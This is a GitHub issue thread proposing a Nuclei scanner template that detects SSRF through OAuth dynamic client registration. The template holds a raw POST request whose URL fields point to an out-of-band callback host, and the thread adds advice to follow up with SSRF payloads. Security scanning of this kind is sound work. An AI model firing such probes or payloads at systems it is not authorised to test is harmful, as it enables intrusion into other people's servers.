### ISSUE TITLE
ssrf-via-oauth-misconfig.yaml

### ISSUE THREAD

**Issue by mrsin15** [projectdiscovery/nuclei-templates#1703]
**Template Details**
This is a template to automate some part of finding SSRF from an OAuth Misconfig listed here:
https://portswigger.net/research/hidden-oauth-attack-vectors
```
## Made with love by @KabirSuda on Twitter
## If vulnerable, then try to inject SSRF payloads in parameters that take URLs as input.
id: ssrf-via-oauth-misconfig

info:
  name: SSRF due to misconfiguration in OAuth
  author: KabirSuda
  severity: medium
  description: Sends a POST request with the endpoint "/connect/register" to check external Interaction with multiple POST parameters.
  tags: misconfig,oob,oauth

requests:
  - raw:
      - |
        POST /connect/register HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
        Accept-Language: en-US,en;q=0.9
        Connection: close

        {
          "application_type": "web",
          "redirect_uris": ["https://{{interactsh-url}}/callback"],
          "client_name": "{{Hostname}}",
          "logo_uri": "https://{{interactsh-url}}/favicon.ico",
          "subject_type": "pairwise",
          "token_endpoint_auth_method": "client_secret_basic",
          "request_uris": ["https://{{interactsh-url}}"]
        }

    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"
```

**Comment by DhiyaneshGeek** [comment]
@mrsin15 having multiple status could result in more false positive

If you have any more matcher it would be good :))

**Comment by mrsin15** [comment]
@DhiyaneshGeek I think this would be fine because if this request works then we just need to put our SSRF payloads in parameters such as request_uri, redirect_uri, or logo_uri and there is a chance that SSRF might work. This template is basically to find out if the specified request works or not. If it does work, then it should be worth checking for SSRF.

**Comment by ehsandeep** [comment]
@mrsin15 We can replace the URLs with OOB payload directly as `{{interactsh-url}} and look for Interaction as Nuclei have native [interactsh Integration](https://blog.projectdiscovery.io/nuclei-interactsh-integration/) support, I will update the template accordingly.

**Comment by mrsin15** [comment]
Sure! 👍

**Comment by ehsandeep** [comment]
thanks, @mrsin15, Added this template in linked PR.

**Comment by mrsin15** [comment]
Thanks @ehsandeep !!
:)

**Comment by maroou49** [comment]
any one tried to report this ? what could be next if we did received the dns queries ?
